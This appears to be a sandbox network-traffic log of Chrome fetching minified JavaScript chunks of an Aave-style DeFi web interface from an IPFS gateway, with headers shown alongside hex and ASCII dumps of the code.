                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 66 6c 65 78 3a 31 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 33 38 33 44 35 31 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 22 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 2c 20 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 3a 68 6f 76 65 72 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 46 46 46 46 46 46 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 22 7d 2c 22 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 2c 20 26 2e 4d 75 69 2d 64 69 73 61 62 6c 65 64 22 3a 7b 7a 49 6e 64 65 78 3a 31 30 30 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 22 2e 4d 75 69 54 79 70
                                                                                                                                                                                                                                                  Data Ascii: flex:1,backgroundColor:"#383D51",borderRadius:"4px","&.Mui-selected, &.Mui-selected:hover":{backgroundColor:"#FFFFFF",borderRadius:"4px !important"},"&.Mui-selected, &.Mui-disabled":{zIndex:100,height:"100%",display:"flex",justifyContent:"center",".MuiTyp
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 73 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 6e 2e 5a 29 28 65 2c 74 2c 72 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 73 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                  Data Ascii: ;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?s(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):s(Object(r)).forEach((function(
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 3a 31 2c 78 73 6d 3a 30 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 7d 29 2c 28 30 2c 78 2e 6a 73 78 73 29 28 61 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 66 6c 65 78 57 72 61 70 3a 22 77 72 61 70 22 2c 6d 62 3a 74 3f 30 3a 34 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 72 26 26 28 30 2c 78 2e 6a 73 78 29 28 64 2e 74 46 2c 7b 7d 29 2c 62 26 26 68 26 26 28 30 2c 78 2e 6a 73 78 29 28 70 2e 72 55 2c 7b 68 72 65 66 3a 70 2e 5a 36 2e 6d 69 67 72 61 74 69 6f 6e 54 6f 6f 6c 2c 73 78 3a 7b 6d 74 3a 7b 78 73 3a 32 2c 78 73 6d 3a 30 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 78 2e 6a 73 78 29 28 63 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 67 72 61 64 69 65 6e 74 22 2c 73 69
                                                                                                                                                                                                                                                  Data Ascii: :1,xsm:0}},children:t})}),(0,x.jsxs)(a.Z,{sx:{display:"flex",alignItems:"flex-start",flexWrap:"wrap",mb:t?0:4},children:[r&&(0,x.jsx)(d.tF,{}),b&&h&&(0,x.jsx)(p.rU,{href:p.Z6.migrationTool,sx:{mt:{xs:2,xsm:0}},children:(0,x.jsx)(c.Z,{variant:"gradient",si
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC284INData Raw: 2c 7b 70 62 3a 30 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 73 29 28 6f 2e 5a 2c 7b 73 78 3a 7b 70 78 3a 7b 78 73 3a 34 2c 78 73 6d 3a 36 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 21 72 26 26 28 30 2c 73 2e 6a 73 78 29 28 61 2e 56 2c 7b 70 61 67 65 54 69 74 6c 65 3a 74 2c 77 69 74 68 4d 61 72 6b 65 74 53 77 69 74 63 68 65 72 3a 6e 2c 77 69 74 68 4d 69 67 72 61 74 65 42 75 74 74 6f 6e 3a 63 2c 62 72 69 64 67 65 3a 75 7d 29 2c 72 26 26 72 2c 28 30 2c 73 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 67 61 70 3a 7b 78 73 3a 33 2c 78 73 6d 3a 38 7d 2c 66 6c 65 78 57 72 61 70 3a 22 77 72 61 70 22 2c 77 69 64 74 68 3a 22 31 30 30 25
                                                                                                                                                                                                                                                  Data Ascii: ,{pb:0}),children:(0,s.jsxs)(o.Z,{sx:{px:{xs:4,xsm:6}},children:[!r&&(0,s.jsx)(a.V,{pageTitle:t,withMarketSwitcher:n,withMigrateButton:c,bridge:u}),r&&r,(0,s.jsx)(o.Z,{sx:{display:"flex",alignItems:"flex-start",gap:{xs:3,xsm:8},flexWrap:"wrap",width:"100%


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  67192.168.2.549784209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC504OUTGET /_next/static/chunks/1226.2b4574c57c2b36b6.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 17588
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreievfxvb3qpn3jq3m33ypqfruljj6ensexvrqm5xdzq4ywxv57gpxe"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1226.2b4574c57c2b36b6.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreievfxvb3qpn3jq3m33ypqfruljj6ensexvrqm5xdzq4ywxv57gpxe
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-02
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028478
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC104INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 61 66 63 64 39 34 32 64 63 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42afcd942dc-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 32 32 36 5d 2c 7b 31 32 35 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 34 39 35 30 31 29 2c 73 3d 72 28 38 35 38 39 33 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 44 75 65 20 74 6f 20 69 6e 74 65 72 6e 61 6c 20 73 74 45 54 48 20 6d 65 63 68 61 6e 69 63 73 20 72 65 71 75 69 72 65 64 20 66 6f 72 20 72 65 62 61 73 69 6e 67 20 73 75 70 70 6f 72
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1226],{1252:function(e,t,r){r.d(t,{O:function(){return a}});var n=r(49501),s=r(85893),a=function(){return(0,s.jsx)(n.cC,{id:"Due to internal stETH mechanics required for rebasing suppor
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 73 57 72 6f 6e 67 4e 65 74 77 6f 72 6b 2c 69 3d 65 2e 73 78 2c 6c 3d 65 2e 70 6f 6f 6c 52 65 73 65 72 76 65 2c 75 3d 65 2e 74 61 72 67 65 74 52 65 73 65 72 76 65 2c 63 3d 65 2e 69 73 4d 61 78 53 65 6c 65 63 74 65 64 2c 64 3d 65 2e 75 73 65 46 6c 61 73 68 4c 6f 61 6e 2c 70 3d 65 2e 6c 6f 61 64 69 6e 67 2c 6d 3d 65 2e 73 79 6d 62 6f 6c 2c 66 3d 65 2e 62 6c 6f 63 6b 65 64 2c 78 3d 65 2e 62 75 69 6c 64 54 78 46 6e 2c 68 3d 28 30 2c 55 2e 5a 29 28 65 2c 4b 29 2c 76 3d 28 30 2c 7a 2e 59 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 5b 65 2e 73 77 61 70 43 6f 6c 6c 61 74 65 72 61 6c 2c 65 2e 63 75 72 72 65 6e 74 4d 61 72 6b 65 74 44 61 74 61 5d 7d 29 29 2c 79 3d 28 30 2c 5f 2e 5a 29 28 76 2c 32 29 2c 67 3d 79 5b 30 5d 2c 62 3d 79 5b 31 5d 2c 77
                                                                                                                                                                                                                                                  Data Ascii: sWrongNetwork,i=e.sx,l=e.poolReserve,u=e.targetReserve,c=e.isMaxSelected,d=e.useFlashLoan,p=e.loading,m=e.symbol,f=e.blocked,x=e.buildTxFn,h=(0,U.Z)(e,K),v=(0,z.Y)((function(e){return[e.swapCollateral,e.currentMarketData]})),y=(0,_.Z)(v,2),g=y[0],b=y[1],w
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 61 64 64 72 65 73 73 65 73 2e 53 57 41 50 5f 43 4f 4c 4c 41 54 45 52 41 4c 5f 41 44 41 50 54 45 52 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 22 2c 64 65 70 73 3a 5b 75 2e 73 79 6d 62 6f 6c 2c 72 5d 7d 29 2c 6a 3d 77 2e 61 70 70 72 6f 76 61 6c 2c 41 3d 77 2e 61 63 74 69 6f 6e 2c 4f 3d 77 2e 61 70 70 72 6f 76 61 6c 54 78 53 74 61 74 65 2c 54 3d 77 2e 6d 61 69 6e 54 78 53 74 61 74 65 2c 44 3d 77 2e 6c 6f 61 64 69 6e 67 54 78 6e 73 2c 43 3d 77 2e 72 65 71 75 69 72 65 73 41 70 70 72 6f 76 61 6c 3b 72 65 74 75 72 6e 28 30 2c 47 2e 6a 73 78 29 28 71 2e 42 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65
                                                                                                                                                                                                                                                  Data Ascii: addresses.SWAP_COLLATERAL_ADAPTER)&&void 0!==t?t:"",deps:[u.symbol,r]}),j=w.approval,A=w.action,O=w.approvalTxState,T=w.mainTxState,D=w.loadingTxns,C=w.requiresApproval;return(0,G.jsx)(q.B,function(e){for(var t=1;t<arguments.length;t++){var r=null!=argume
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 61 6e 74 3a 22 72 65 63 74 61 6e 67 75 6c 61 72 22 2c 68 65 69 67 68 74 3a 32 30 2c 77 69 64 74 68 3a 31 30 30 2c 73 78 3a 7b 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 7d 7d 29 2c 28 30 2c 47 2e 6a 73 78 29 28 65 65 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 72 65 63 74 61 6e 67 75 6c 61 72 22 2c 68 65 69 67 68 74 3a 31 35 2c 77 69 64 74 68 3a 38 30 2c 73 78 3a 7b 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 6d 61 72 67 69 6e 54 6f 70 3a 22 34 70 78 22 7d 7d 29 5d 7d 29 3b 72 65 74 75 72 6e 28 30 2c 47 2e 6a 73 78 73 29 28 47 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 6e 26 26 28 30 2c 47 2e 6a 73 78 29 28 77 2e 6a 7a 2c 7b 68 65 61 6c 74 68 46 61 63 74 6f 72 3a 72 2c 66 75 74 75 72 65 48 65 61 6c 74 68 46 61 63 74
                                                                                                                                                                                                                                                  Data Ascii: ant:"rectangular",height:20,width:100,sx:{borderRadius:"4px"}}),(0,G.jsx)(ee.Z,{variant:"rectangular",height:15,width:80,sx:{borderRadius:"4px",marginTop:"4px"}})]});return(0,G.jsxs)(G.Fragment,{children:[n&&(0,G.jsx)(w.jz,{healthFactor:r,futureHealthFact
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 73 68 6f 6c 64 2c 70 65 72 63 65 6e 74 3a 21 30 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 30 2c 6c 6f 61 64 69 6e 67 3a 75 7d 29 2c 28 30 2c 47 2e 6a 73 78 29 28 74 65 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 28 30 2c 47 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 53 75 70 70 6c 79 20 62 61 6c 61 6e 63 65 20 61 66 74 65 72 20 73 77 69 74 63 68 22 7d 29 2c 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 6d 62 3a 34 2c 61 6c 69 67 6e 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 47 2e 6a 73 78 73 29 28 64 2e 5a 2c 7b 73 78 3a 7b 74 65 78 74 41 6c 69 67 6e 3a 22 72 69 67 68 74 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 47 2e 6a 73 78 29 28 64 2e 5a 2c 7b 73 78 3a 7b 64 69 73
                                                                                                                                                                                                                                                  Data Ascii: shold,percent:!0,visibleDecimals:0,loading:u}),(0,G.jsx)(te.X,{caption:(0,G.jsx)(s.cC,{id:"Supply balance after switch"}),captionVariant:"description",mb:4,align:"flex-start",children:(0,G.jsxs)(d.Z,{sx:{textAlign:"right"},children:[(0,G.jsx)(d.Z,{sx:{dis
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6e 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 73 65 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72
                                                                                                                                                                                                                                                  Data Ascii: bject.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function se(e){for(var t=1;t<arguments.length;t++){var r
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 2e 61 76 61 69 6c 61 62 6c 65 4c 69 71 75 69 64 69 74 79 29 2e 6d 75 6c 74 69 70 6c 69 65 64 42 79 28 2e 39 39 29 29 2e 74 6f 53 74 72 69 6e 67 28 31 30 29 2c 64 65 3d 22 2d 31 22 3d 3d 3d 51 2c 70 65 3d 64 65 3f 63 65 3a 51 2c 6d 65 3d 28 30 2c 4f 2e 6b 29 28 7b 63 68 61 69 6e 49 64 3a 57 2e 75 6e 64 65 72 6c 79 69 6e 67 43 68 61 69 6e 49 64 7c 7c 55 2c 75 73 65 72 41 64 64 72 65 73 73 3a 48 2c 73 77 61 70 49 6e 3a 73 65 28 73 65 28 7b 7d 2c 74 29 2c 7b 7d 2c 7b 61 6d 6f 75 6e 74 3a 65 65 2e 63 75 72 72 65 6e 74 7d 29 2c 73 77 61 70 4f 75 74 3a 73 65 28 73 65 28 7b 7d 2c 75 65 2e 72 65 73 65 72 76 65 29 2c 7b 7d 2c 7b 61 6d 6f 75 6e 74 3a 22 30 22 7d 29 2c 6d 61 78 3a 64 65 2c 73 6b 69 70 3a 7a 2e 6c 6f 61 64 69 6e 67 7c 7c 21 31 2c 6d 61 78 53 6c 69 70
                                                                                                                                                                                                                                                  Data Ascii: .availableLiquidity).multipliedBy(.99)).toString(10),de="-1"===Q,pe=de?ce:Q,me=(0,O.k)({chainId:W.underlyingChainId||U,userAddress:H,swapIn:se(se({},t),{},{amount:ee.current}),swapOut:se(se({},ue.reserve),{},{amount:"0"}),max:de,skip:z.loading||!1,maxSlip
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 65 20 74 6f 20 68 65 61 6c 74 68 20 66 61 63 74 6f 72 20 69 6d 70 61 63 74 2c 20 61 20 66 6c 61 73 68 6c 6f 61 6e 20 69 73 20 72 65 71 75 69 72 65 64 20 74 6f 20 70 65 72 66 6f 72 6d 20 74 68 69 73 20 74 72 61 6e 73 61 63 74 69 6f 6e 2c 20 62 75 74 20 41 61 76 65 20 47 6f 76 65 72 6e 61 6e 63 65 20 68 61 73 20 64 69 73 61 62 6c 65 64 20 66 6c 61 73 68 6c 6f 61 6e 20 61 76 61 69 6c 61 62 69 6c 69 74 79 20 66 6f 72 20 74 68 69 73 20 61 73 73 65 74 2e 20 54 72 79 20 6c 6f 77 65 72 69 6e 67 20 74 68 65 20 61 6d 6f 75 6e 74 20 6f 72 20 73 75 70 70 6c 79 69 6e 67 20 61 64 64 69 74 69 6f 6e 61 6c 20 63 6f 6c 6c 61 74 65 72 61 6c 2e 22 7d 29 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 3b 69 66 28 7a 2e 73 75 63 63 65 73 73 29 72 65 74 75 72
                                                                                                                                                                                                                                                  Data Ascii: e to health factor impact, a flashloan is required to perform this transaction, but Aave Governance has disabled flashloan availability for this asset. Try lowering the amount or supplying additional collateral."});default:return null}};if(z.success)retur
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 63 65 54 65 78 74 3a 28 30 2c 47 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 53 75 70 70 6c 79 20 62 61 6c 61 6e 63 65 22 7d 29 2c 69 73 4d 61 78 53 65 6c 65 63 74 65 64 3a 64 65 7d 29 2c 28 30 2c 47 2e 6a 73 78 73 29 28 64 2e 5a 2c 7b 73 78 3a 7b 70 61 64 64 69 6e 67 3a 22 31 38 70 78 22 2c 70 74 3a 22 31 34 70 78 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 73 70 61 63 65 2d 62 65 74 77 65 65 6e 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 47 2e 6a 73 78 29 28 70 2e 5a 2c 7b 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 31 38 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 47 2e 6a 73 78 29 28 63 2e 5a 2c 7b 7d 29 7d 29 2c 28 30 2c 47 2e 6a 73 78 29 28 68 2e 42
                                                                                                                                                                                                                                                  Data Ascii: ceText:(0,G.jsx)(s.cC,{id:"Supply balance"}),isMaxSelected:de}),(0,G.jsxs)(d.Z,{sx:{padding:"18px",pt:"14px",display:"flex",justifyContent:"space-between"},children:[(0,G.jsx)(p.Z,{sx:{fontSize:"18px !important"},children:(0,G.jsx)(c.Z,{})}),(0,G.jsx)(h.B


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  68192.168.2.549781209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC504OUTGET /_next/static/chunks/6504.d2701b5d1c9eba02.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 15198
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigindxcv35pthlj774za7jzsv57ddnf42agbeftshd6biwfbs6mgy"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/6504.d2701b5d1c9eba02.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreigindxcv35pthlj774za7jzsv57ddnf42agbeftshd6biwfbs6mgy
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 7468002
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 61 66 64 37 33 34 31 66 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42afd7341ff-EWR
